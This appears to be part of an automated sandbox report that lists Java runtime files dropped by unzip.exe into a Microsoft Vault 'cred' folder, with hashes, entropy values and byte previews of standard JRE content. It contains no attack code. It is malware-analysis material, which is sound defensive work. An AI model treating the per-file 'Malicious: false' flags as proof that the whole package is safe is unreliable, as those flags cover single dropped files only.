Preview:	<?xml version="1.0" encoding="UTF-8"?>.. . Recommended way to edit .jfc files is to use Java Mission Control,. see Window -> Flight Recorder Template Manager..-->..<configuration version="1.0" name="Profiling" description="Low overhead configuration for profiling, typically around 2 % overhead." provider="Oracle">.. <producer uri="http://www.oracle.com/hotspot/jvm/" label="Oracle JDK">.. <control>.. . Contents of the control element is not read by the JVM, it's used. by Java Mission Control to change settings that carry the control attribute.. -->.. <selection name="gc-level" default="detailed" label="Garbage Collector">. <option label="Off" name="off">off</option>. <option label="Normal" name="detailed">normal</option>. <option label="All" name="all">all</option>. </selection>.. <condition name="gc-enabled-normal" true="true" false="false">. <or>. <test name="gc-level" operator="equal"

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\jfxswt.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	33918
Entropy (8bit):	7.932541444292051
Encrypted:	false
SSDEEP:	768:yYlmRKiT49sUcHLJSCsd619SKYqLkClJzziojL+WIGAE6xy:yYIR/Te/cH0Csd61cj89jL+W9p6xy
MD5:	24F8A58F2907A8329133B64360EB3421
SHA1:	ADD5CFC6CFFFA08ED87A6D7338C576A1AD2E3A60
SHA-256:	CB92C1E65AAD71A491F5A1F2D02ED141873BC490540F5D70212D47C1B895453F
SHA-512:	6305263D5CEA186A12A46140FBFD31BAF14828DA2370EFCCC5712A18A28E07B2737E9CF44F049512C780A1DBDFFF47E5EA90AC084D53E62CCAA00F55AE611D72
Malicious:	false
Preview:	PK........S.>Y................META-INF/....PK........R.>Y...a^...j.......META-INF/MANIFEST.MF.M..LK-...K-...R0.3..r.C.q,HL.HU...%.....y...R.KRSt.A:,...-.u..,.4....sR......K.Fh.r.r..PK........S.>Y................javafx/PK........S.>Y................javafx/embed/PK........S.>Y................javafx/embed/swt/PK........[.=Yj...........%...javafx/embed/swt/CustomTransfer.class.T[S.F.=.MX(..!............8..`h.d....." yd..........4....%..k.N..ka.83..[.....\|+...........#.OD..1...1.1.S1....>..I..TL.....Y...S.q.-KAja..6.M.Y7V\|.v...e............+...u...Z.....Z......k...O.v.....x..f...M.v...~I....j.N.(.R.... ..n.%).l:.N..,J...-.%.os:.v.K..V.._p.u.l..e...S5...^.....3+.Yy.h.RtGR..y.)..~...g..R.;5K...{.G...X.JP....D....8..[3.g...'d.e#Z.\|c.j.t..F.w..t.W.j.,K[q.^..E.=M.a..6d.Z..yV.....=..........:.WG.............RA.<......qT...,.=.....t\......(aI.2.....!..Jp.,..<.x..n.S....N.K.e.W....N.-..`....hmQ.E.fGE..$..n...4I{.......l_.)......?.Z>.

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\jsse.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	1790132
Entropy (8bit):	5.941433452069579
Encrypted:	false
SSDEEP:	12288:cjoq7WlWD3osf3hpaGSEqyMNfXmIDxWnjH2Hmhm:cjowxf3hpdSwMtDDwY
MD5:	6D95D005668307B18FA750C07EF6858F
SHA1:	15E36DCDFB055B8E2422F1628256656C1F216F58
SHA-256:	CA302C2A6E0A903B608E06A9D702472FDDFDA118F6907697A7EA53C01C3AB4DB
SHA-512:	961D73DF0939D292007A0EF5FFA1956121E3E439CCA0398419D18F05BA4C7FA25802DD8949BD8841E24243E2AEBCAE0B7BDD4BD0603B4024EC5C2BA45C01F718
Malicious:	false
Preview:	PK........IB>Y................META-INF/....PK........IB>Y\.d.?...?.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_431..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_291 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK.........A>Y`..b........+...com/sun/net/ssl/internal/ssl/Provider.class.......4.....()V...()Z...<init>...J..%com/sun/net/ssl/internal/ssl/Provider...install...isFIPS...serialVersionUID...sun/security/ssl/SunJSSE.,..c".J-.........(Ljava/lang/String;)V...(Ljava/security/Provider;)V...........................................Code...ConstantValue.1..............................................................................+..............................*+.........).............................)...........................PK.........A>Y3.2........;...com/sun/net/ssl/internal/ssl/X5

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\jvm.hprof.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Algol 68 source, ASCII text
Category:	dropped
Size (bytes):	4226
Entropy (8bit):	4.708892688554676
Encrypted:	false
SSDEEP:	96:CYrYJDrYJ+RvJ3z3d9uGG7hPxTRnhTbraYfwE5DyK:CYrsDrsgvJ3z3buGG7LvSmhDz
MD5:	C677FF69E70DC36A67C72A3D7EF84D28
SHA1:	FBD61D52534CDD0C15DF332114D469C65D001E33
SHA-256:	B055BF25B07E5AC70E99B897FB8152F288769065B5B84387362BB9CC2E6C9D38
SHA-512:	32D82DAEDBCA1988282A3BF67012970D0EE29B16A7E52C1242234D88E0F3ED8AF9FC9D6699924D19D066FD89A2100E4E8898AAC67675D4CD9831B19B975ED568
Malicious:	false
Preview:	Copyright (c) 2003, 2005, Oracle and/or its affiliates. All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions.are met:.. - Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer... - Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... - Neither the name of Oracle nor the names of its. contributors may be used to endorse or promote products derived. from this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS.IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,.THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR.PURPOSE ARE DISCLAIMED.

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\logging.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	2455
Entropy (8bit):	4.47026133037931
Encrypted:	false
SSDEEP:	48:EmdS5PQQL8pRNYHjVsnkYXxtOGh1xdvjMgxH:G9NL3HjVLG1XrM8H
MD5:	809C50033F825EFF7FC70419AAF30317
SHA1:	89DA8094484891F9EC1FA40C6C8B61F94C5869D0
SHA-256:	CE1688FE641099954572EA856953035B5188E2CA228705001368250337B9B232
SHA-512:	C5AA71AD9E1D17472644EB43146EDF87CAA7BCCF0A39E102E31E6C081CD017E01B39645F55EE87F4EA3556376F7CAD3953CE3F3301B4B3AF265B7B4357B67A5C
Malicious:	false
Preview:	############################################################.# .Default Logging Configuration File.#.# You can use a different file by specifying a filename.# with the java.util.logging.config.file system property. .# For example java -Djava.util.logging.config.file=myfile.############################################################..############################################################.# .Global properties.############################################################..# "handlers" specifies a comma separated list of log Handler .# classes. These handlers will be installed during VM startup..# Note that these classes must be on the system classpath..# By default we only configure a ConsoleHandler, which will only.# show messages at the INFO and above levels..handlers= java.util.logging.ConsoleHandler..# To also add the FileHandler, use the following line instead..#handlers= java.util.logging.FileHandler, java.util.logging.ConsoleHandler..# Default global logging level..# This

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\management-agent.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	382
Entropy (8bit):	5.014210112288598
Encrypted:	false
SSDEEP:	6:5jm/MB4r/Rjm/0zbdy/oocj+od0X2K5YZ5/Cy9xxm/ym4xI7lgxmzbdGh/7:5jWMGJjWwq1cCA0XPA/Ccx82K6x2K/7
MD5:	C5F5428A44BE008D7458439A9BD8AAA7
SHA1:	523EFBA8A82F9E58A4997EAFD86DEA7EDF974692
SHA-256:	18AC2CEBD3D7D4E29AEC9C0E99D695AC3E99C3FE9205C817E38E1F728CF824FB
SHA-512:	A883B39CDFDE5A8B919D82BA7FFE800D5B0F47F4B63B1CCDDB5EE4698EED3A3B8CC49347E8F8756D34AB2A7A0341BFB7228206FBA19A4F6F3C73FF9CE4326024
Malicious:	false
Preview:	PK........HB>Y................META-INF/......PK..............PK........HB>Y................META-INF/MANIFEST.MF.M..LK-...K-...R0.3..r.JM,IM.u........Y.h..%&.*8.....%...k.r9....:.$..[).....&.%....E..r.\.E....y...r..PK..#...l.......PK..........HB>Y..............................META-INF/....PK..........HB>Y#...l.....................=...META-INF/MANIFEST.MFPK..........}.........

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\management\jmxremote.access

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	3998
Entropy (8bit):	4.420205717459709
Encrypted:	false
SSDEEP:	96:OWi7j79eK8MCN/xK4ijnv+wtosJj/D9mQyZWZuQgQX+dv:OWiv7b8rNXE+wusxr9m5WZuVDv
MD5:	F63BEA1F4A31317F6F061D83215594DF
SHA1:	21200EAAD898BA4A2A8834A032EFB6616FABB930
SHA-256:	439158EB513525FEDA19E0E4153CCF36A08FE6A39C0C6CEEB9FCEE86899DD33C
SHA-512:	DE49913B8FA2593DC71FF8DAC85214A86DE891BEDEE0E4C5A70FCDD34E605F8C5C8483E2F1BDB06E1001F7A8CF3C86CAD9FA575DE1A4DC466E0C8FF5891A2773
Malicious:	false
Preview:	######################################################################.# Default Access Control File for Remote JMX(TM) Monitoring.######################################################################.#.# Access control file for Remote JMX API access to monitoring..# This file defines the allowed access for different roles. The.# password file (jmxremote.password by default) defines the roles and their.# passwords. To be functional, a role must have an entry in.# both the password and the access files..#.# The default location of this file is $JRE/lib/management/jmxremote.access.# You can specify an alternate location by specifying a property in .# the management config file $JRE/lib/management/management.properties.# (See that file for details).#.# The file format for password and access files is syntactically the same.# as the Properties file format. The syntax is described in the Javadoc.# for java.util.Properties.load..# A typical access file has multiple lines, where each

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\management\jmxremote.password.template

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	2856
Entropy (8bit):	4.492265087792545
Encrypted:	false
SSDEEP:	48:MGS+Hpamow7YNkjP9YZAuFovuAnNpG1GMV/BWEUHXYE9nN6k5:Mdm7RT9tvuAnujaE0rN6g
MD5:	7B46C291E7073C31D3CE0ADAE2F7554F
SHA1:	C1E0F01408BF20FBBB8B4810520C725F70050DB5
SHA-256:	3D83E336C9A24D09A16063EA1355885E07F7A176A37543463596B5DB8D82F8FA
SHA-512:	D91EEBC8F30EDCE1A7E16085EB1B18CFDDF0566EFAB174BBCA53DE453EE36DFECB747D401E787A4D15CC9798E090E19A8A0CF3FC8246116CE507D6B464068CDB
Malicious:	false
Preview:	# ----------------------------------------------------------------------.# Template for jmxremote.password.#.# o Copy this template to jmxremote.password.# o Set the user/password entries in jmxremote.password.# o Change the permission of jmxremote.password to read-only.# by the owner..#.# See below for the location of jmxremote.password file..# ----------------------------------------------------------------------..##############################################################.# Password File for Remote JMX Monitoring.##############################################################.#.# Password file for Remote JMX API access to monitoring. This.# file defines the different roles and their passwords. The access.# control file (jmxremote.access by default) defines the allowed.# access for each role. To be functional, a role must have an entry.# in both the password and the access files..#.# Default location of this file is $JRE/lib/management/jmxremote.password.# You

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\management\management.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	14630
Entropy (8bit):	4.568210341404396
Encrypted:	false
SSDEEP:	384:Fqsmpsj42wbZTHV+Dq3xtP3xPqaNC/R1a:wsmpsjL0ZTHV++3xtpi68Xa
MD5:	5EDB0D3275263013F0981FF0DF96F87E
SHA1:	E0451D8D7D9E84D7B1C39EC7D00993307A5CBBF1
SHA-256:	3A923735D9C2062064CD8FD30FF8CCA84D0BC0AB5A8FAB80FDAD3155C0E3A380
SHA-512:	F31A3802665F9BB1A00A0F838B94AE4D9F1B9D6284FAF626EBE4F96819E24494771A1B8BFE655FD2DA202C5463D47BAE3B2391764E6F4C5867C0337AA21C87C1
Malicious:	false
Preview:	#####################################################################.#.Default Configuration File for Java Platform Management.#####################################################################.#.# The Management Configuration file (in java.util.Properties format).# will be read if one of the following system properties is set:.# -Dcom.sun.management.jmxremote.port=<port-number>.# or -Dcom.sun.management.snmp.port=<port-number>.# or -Dcom.sun.management.config.file=<this-file>.#.# The default Management Configuration file is:.#.# $JRE/lib/management/management.properties.#.# Another location for the Management Configuration File can be specified.# by the following property on the Java command line:.#.# -Dcom.sun.management.config.file=<this-file>.#.# If -Dcom.sun.management.config.file=<this-file> is set, the port.# number for the management agent can be specified in the config file.# using the following lines:.#.# ################ Management Agent Port ################

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\management\snmp.acl.template

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	3376
Entropy (8bit):	4.371600962667748
Encrypted:	false
SSDEEP:	48:MkX7W6+IX6XXZAHAvuAn97+onkFOqRCjEhd//SVBteM8hq/unuxsIsxuEAJw2n:MU6bpjvuAnEokSIU/uuxJn
MD5:	71A7DE7DBE2977F6ECE75C904D430B62
SHA1:	2E9F9AC287274532EB1F0D1AFCEFD7F3E97CC794
SHA-256:	F1DC97DA5A5D220ED5D5B71110CE8200B16CAC50622B33790BB03E329C751CED
SHA-512:	3A46E2A4E8A78B190260AFE4EEB54E7D631DB50E6776F625861759C0E0BC9F113E8CD8D734A52327C28608715F6EB999A3684ABD83EE2970274CE04E56CA1527
Malicious:	false
Preview:	# ----------------------------------------------------------------------.# Template for SNMP Access Control List File.#.# o Copy this template to snmp.acl.# o Set access control for SNMP support.# o Change the permission of snmp.acl to be read-only.# by the owner..#.# See below for the location of snmp.acl file..# ----------------------------------------------------------------------..############################################################.# SNMP Access Control List File .############################################################.#.# Default location of this file is $JRE/lib/management/snmp.acl..# You can specify an alternate location by specifying a property in .# the management config file $JRE/lib/management/management.properties.# or by specifying a system property (See that file for details)..#...##############################################################.# File permissions of the snmp.acl file.##############################################

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\meta-index

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2176
Entropy (8bit):	4.992560211448049
Encrypted:	false
SSDEEP:	48:EE796OfeCius2M5tP5iMmC5KOAY2HQii+r4IzteKk:EnEiusJbP5lmC5KOA3HQii+EIz8Kk
MD5:	689C0CBDE7697F43642BF1134F4B70AF
SHA1:	307DB1C4A9570F01479DEA98F6B5BD33A1DEB759
SHA-256:	6BD7EA02B9456A3730755E76D4EE1CCC04C524E93366CD74D7F42AC628D4EC77
SHA-512:	13AFE0797D9C2C7AB8721FBEDAB42225B41F45059A9167C046A11E1BF6E03AD82ACCAED42884DFF335B66EC41D3608D0D0BD06582AF51634A81550C81BAFF2FB
Malicious:	false
Preview:	% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..# charsets.jar..sun/nio..sun/awt..# jce.jar..javax/crypto..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# jfr.jar..oracle/jrockit/..jdk/jfr..com/oracle/jrockit/..# jfxswt.jar..javafx/embed/..META-INF/INDEX.LIST..! jsse.jar..sun/security..com/sun/net/..! management-agent.jar..@ resources.jar..com/sun/java/util/jar/pack/..META-INF/services/sun.util.spi.XmlPropertiesProvider..META-INF/services/javax.print.PrintServiceLookup..com/sun/corba/..META-INF/services/javax.sound.midi.spi.SoundbankReader..sun/print..META-INF/services/javax.sound.midi.spi.MidiFileReader..META-INF/services/sun.java2d.cmm.CMMServiceProvider..javax/swing..META-INF/services/javax.sound.sampled.spi.AudioFileReader..META-INF/services/javax.sound.midi.spi.MidiDeviceProvider..sun/net..META-INF/services/javax.sound.sampled.spi.AudioFileWriter..com/s

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\net.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	6185
Entropy (8bit):	4.813267332170562
Encrypted:	false
SSDEEP:	192:YEVGG4f4z34m04Pet5m27SRgTe93hf7k9Ss:5GGGYCSgY3hzk9v
MD5:	40ECDA055B0667A3CC0B272CF4FE415E
SHA1:	9AA14CC3FE10B8D097555E273026B5507AB7D09D
SHA-256:	F4567500FD182E9912C7ED58633EBA1737619EBEFC79C52A583DF54A0226127A
SHA-512:	7DC981CB41848A66484C2A3E85A3DCFF76A10A23CF9F800F1933D985B380EF77A8E2145A03CA430EAC0C5E2895A323C500FDF7D38E9675F2C971DA143FF54E03
Malicious:	false
Preview:	############################################################.# Default Networking Configuration File.#.# This file may contain default values for the networking system properties..# These values are only used when the system properties are not specified.# on the command line or set programatically..# For now, only the various proxy settings can be configured here..############################################################..# Whether or not the DefaultProxySelector will default to System Proxy.# settings when they do exist..# Set it to 'true' to enable this feature and check for platform.# specific proxy settings.# Note that the system properties that do explicitely set proxies.# (like http.proxyHost) do take precedence over the system settings.# even if java.net.useSystemProxies is set to true...java.net.useSystemProxies=false..#------------------------------------------------------------------------.# Proxy configuration for the various protocol handlers..# DO NOT uncomment th

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\plugin.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	1924789
Entropy (8bit):	6.075454846964748
Encrypted:	false
SSDEEP:	12288:WMgINRy5mJJjTeUYVU/qyg795yfdTNJob:WjIN8UJBq2JfdAb
MD5:	A261A5E8DED38F9D7D33C87F48F94C82
SHA1:	E76E12EBA64AEBB85DE3F4D3BF518EF4E2C5E254
SHA-256:	58AD4788DA511874E71801A6581AC60F275559369B19A04C484AC40C0AF2EC4E
SHA-512:	FCE3CFB1CCAFAA06F2EACEAD1FC9A1525F818A4EB3B0B5A67196A5683F7A09A94E97053635B74BB8019CC2A1B40E9FD8C76A24DD820BE03CBBE639E7D0FFF080
Malicious:	false
Preview:	PK.........B>Y................META-INF/....PK.........B>YF.Wi...i.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.10.6..Created-By: 1.8.0_431-b10 (Oracle Corporation)....PK.........B>Y................com/PK.........B>Y................com/sun/PK.........B>Y................com/sun/deploy/PK.........B>Y................com/sun/deploy/uitoolkit/PK.........B>Y................com/sun/deploy/uitoolkit/impl/PK.........B>Y............"...com/sun/deploy/uitoolkit/impl/awt/PK.........B>Y............#...com/sun/deploy/uitoolkit/impl/text/PK.........B>Y................com/sun/deploy/uitoolkit/ui/PK.........B>Y................com/sun/java/PK.........B>Y................com/sun/java/browser/PK.........B>Y................com/sun/java/browser/plugin2/PK.........B>Y............)...com/sun/java/browser/plugin2/liveconnect/PK.........B>Y............,...com/sun/java/browser/plugin2/liveconnect/v1/PK.........B>Y................netscape/PK.........B>Y................netscape/javascr

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\psfont.properties.ja

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	2796
Entropy (8bit):	5.182793663606788
Encrypted:	false
SSDEEP:	48:R8s89HoIbTUjbyuJdI2FylXLr96cpcnnI0adbEk+IqdouZ:y56CiPFylXLrMGyJU+B
MD5:	7C5514B805B4A954BC55D67B44330C69
SHA1:	56ED1C661EEEDE17B4FAE8C9DE7B5EDBAD387ABC
SHA-256:	0C790DE696536165913685785EA8CBE1AC64ACF09E2C8D92D802083A6DA09393
SHA-512:	CCD4CB61C95DEFDCBA6A6A3F898C29A64CD5831A8AB50E0AFAC32ADB6A9E0C4A4BA37EB6DEE147830DA33AE0B2067473132C0B91A21D546A6528F42267A2C40E
Malicious:	false
Preview:	#.#.# Copyright (c) 1996, 2000, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#..#.#.Japanese PostScript printer property file.#.font.num=16.#.serif=serif.timesroman=serif.sansserif=sansserif.helvetica=sansserif.monospaced=monospaced.courier=monospaced.dialog=sansserif.dialoginput=monospaced.#.serif.latin1.plain=Times-Roman.serif.latin1.italic=Times-Italic.serif.latin1.bolditalic=Times-BoldItalic.serif.latin1.bold=Times-Bold.#.sansserif.latin1.plain=Helvetica.sansserif.latin1.italic=Helvetica-Oblique.sansserif.latin1.bolditalic=Helvetica-BoldOblique.sansserif.latin1.bold=Helvetica-Bold.#.monospaced.latin1.plain=Courier.monospaced.latin1.italic=Courier-Oblique.monospaced.latin1.bolditalic=Courier-BoldOblique.monospaced.latin1.bold=Courier-Bold.#.serif.x11jis0208.plain=Ryumin-Light-H.serif.x11jis0208.italic=Ryumin-Light-H.serif.x11jis0208.bolditalic=Ryumin-Light-H.serif.x11jis

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\psfontj2d.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	10393
Entropy (8bit):	4.970762688893053
Encrypted:	false
SSDEEP:	192:hPwn+Cyub3Ee4OECKDIcYOhAgZ50OKDQLT2IcpRuWRbHr9NRXUh/QTv9Ho39zPxq:5xzubEFOEscAW5VKsCfHz8RPxGt
MD5:	F8734590A1AEC97F6B22F08D1AD1B4BB
SHA1:	AA327A22A49967F4D74AFEEE6726F505F209692F
SHA-256:	7D51936FA3FD5812AE51F9F5657E0E70487DCA810B985607B6C5D6603F5E6C98
SHA-512:	72E62DC63DAA2591B48B2B774E2479B8861D159061B92FD3A0A06256295DA4D8B20DAFA77983FDBF6179F666F9FF6B3275F7A5BCF9555E638595230B9A42B177
Malicious:	false
Preview:	#.#.# Copyright (c) 1999, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#..#.#.PostScript printer property file for Java 2D printing..#.# WARNING: This is an internal implementation file, not a public file..# Any customisation or reliance on the existence of this file and its.# contents or syntax is discouraged and unsupported..# It may be incompatibly changed or removed without any notice..#.#.font.num=35.#.# Legacy logical font family names and logical font aliases should all.# map to the primary logical font names..#.serif=serif.times=serif.timesroman=serif.sansserif=sansserif.helvetica=sansserif.dialog=sansserif.dialoginput=monospaced.monospaced=monospaced.courier=monospaced.#.# Next, physical fonts which can be safely mapped to standard postscript fonts.# These keys generally map to a value which is the same as the key, so.# the key/value is just a way to say the font has

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\resources.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	3548254
Entropy (8bit):	6.060864328035108
Encrypted:	false
SSDEEP:	49152:+iANfS8AiXU9A4YpQ3tK6UXsV3UJWXksE6jNgD+lgY7CTAzt0D+UtCimc5s3ZtRu:rKlXn
MD5:	6E2DE7B8695EFB0F6668367587908BC2
SHA1:	BAAB18C26F47836D76AFDC441A23CB53DF841053
SHA-256:	8936260BE44B41AFEB68E2AB26C04D575A2A71F64F53E82E7A4442B9E8058B3B
SHA-512:	A776F4A2F6D0E3C24EC3E1ABB9EE3CEE1011270FCA87D84037453BD516EC95A46DB306CA5C00D26DFB00587A34708AF32B742B074C9A8E41E03EE68B32854498
Malicious:	false
Preview:	PK........LB>Y................META-INF/....PK........LB>Y\.d.?...?.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_431..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_291 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK.........A>Y....$...$.......META-INF/mailcap.default#.# This is a very simple 'mailcap' file.#.image/gif;;..x-java-view=com.sun.activation.viewers.ImageViewer.image/jpeg;;..x-java-view=com.sun.activation.viewers.ImageViewer.text/;;..x-java-view=com.sun.activation.viewers.TextViewer.text/;;..x-java-edit=com.sun.activation.viewers.TextEditor.PK.........A>Y..{~2...2.......META-INF/mimetypes.default#.# A simple, old format, mime.types file.#.text/html..html htm HTML HTM.text/plain..txt text TXT TEXT.image/gif..gif GIF.image/ief..ief.image/jpeg..jpeg jpg jpe JPG.image/tiff..tiff tif

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\rt.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	55952350
Entropy (8bit):	6.049626901506283
Encrypted:	false
SSDEEP:	393216:ZaBSleCXGdwFKG93r5zSIR8TcfD3rv51c7Y:ZaBSlmRw3r5zSIR8TcfD3rv5+Y
MD5:	AD5557BEA5D34900793449DA951C5DB9
SHA1:	1179E8CFC72E17807E0D32C81BC042F65B2D3D5B
SHA-256:	6D8974DB217482070EF05D8CEC849B1E45BF43A7FD4FEE571555AE2F6547C48B
SHA-512:	538BA5450B3358285B1D4300575F015EA263CFA31935DEA9CBD21B89701DDAD59599121135879B6D2199DB96C7D04705F36781EFECF8D73D097B137E2C3FD1E6
Malicious:	false
Reputation:	unknown
Preview:	PK........LB>Y................META-INF/....PK........LB>Y...&...&.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_431..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_291 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....Name: javax/swing/JCheckBoxMenuItem.class..Java-Bean: True....Name: javax/swing/JDialog.class..Java-Bean: True....Name: javax/swing/JSlider.class..Java-Bean: True....Name: javax/swing/JTextField.class..Java-Bean: True....Name: javax/swing/JTextPane.class..Java-Bean: True....Name: javax/swing/JTextArea.class..Java-Bean: True....Name: javax/swing/JList.class..Java-Bean: True....Name: javax/swing/JFormattedTextField.class..Java-Bean: True....Name: javax/swing/JApplet.class..Java-Bean: True....Name: javax/swing/JSpinner.class..Java-Bean: True....Name: javax/swing/JLabel.class..Java-Bea

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\security\blacklist

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4054
Entropy (8bit):	5.791238368311065
Encrypted:	false
SSDEEP:	96:uudVZoOZ3mFcFtqZB0q6jV//H2cB/iye6S04UioQeXbZFf6HULUBnSQXHvLnOTSW:uudVZoOZ3mFcXqZB0q6B//H2cB/Ze6SG
MD5:	B2C6EAE6382150192EA3912393747180
SHA1:	D4FFB3857EAB403955CE9D156E46D056061E6A5A
SHA-256:	6C73C877B36D4ABD086CB691959B180513AC5ABC0C87FE9070D2D5426D3DBF71
SHA-512:	898582C23F311F9F46825E7F8B6D36BED7255E5A4E2FA4B4452153B86EFBD88DB7E5B94DBD9CB9DB554F62B84D19F22AE9D81822B4896081C487FB50946A9A9A
Malicious:	false
Reputation:	unknown
Preview:	# JNLPAppletLauncher applet-launcher.jar.SHA1-Digest-Manifest: 5Bo5/eg892hQ9mgbUW56iDmsp1k=..# 7066583.SHA1-Digest-Manifest: x17xGEFzBRXY2pLtXiIbp8J7U9M=.SHA1-Digest-Manifest: ya6YNTzMCFYUO4lwhmz9OWhhIz8=.SHA1-Digest-Manifest: YwuPyF/KMcxcQhgxilzNybFM2+8=..# 7066809.SHA1-Digest-Manifest: dBKbNW1PZSjJ0lGcCeewcCrYx5g=.SHA1-Digest-Manifest: lTYCkD1wm5uDcp2G2PNPcADG/ds=.SHA1-Digest-Manifest: GKwQJtblDEuSVf3LdC1ojpUJRGg=..# 7186931.SHA1-Digest-Manifest: 0CUppG7J6IL8xHqPCnA377Koahw=.SHA1-Digest-Manifest: 3aJU1qSK6IYmt5MSh2IIIj5G1XE=.SHA1-Digest-Manifest: 8F4F0TXA4ureZbfEXWIFm76QGg4=.SHA1-Digest-Manifest: B1NaDg834Bgg+VE9Ca+tDZOd2BI=.SHA1-Digest-Manifest: bOoQga+XxC3j0HiP552+fYCdswo=.SHA1-Digest-Manifest: C4mtepHAyIKiAjjqOm6xYMo8TkM=.SHA1-Digest-Manifest: cDXEH+bR01R8QVxL+KFKYqFgsR0=.SHA1-Digest-Manifest: cO2ccW2cckTvpR0HVgQa362PyHI=.SHA1-Digest-Manifest: D/TyRle6Sl+CDuBFmdOPy03ERaw=.SHA1-Digest-Manifest: eJfWm86yHp2Oz5U8WrMKbpv6GGA=.SHA1-Digest-Manifest: g3mA5HqcRBlKaUVQsapnKhOSEas=.SHA1-Dig

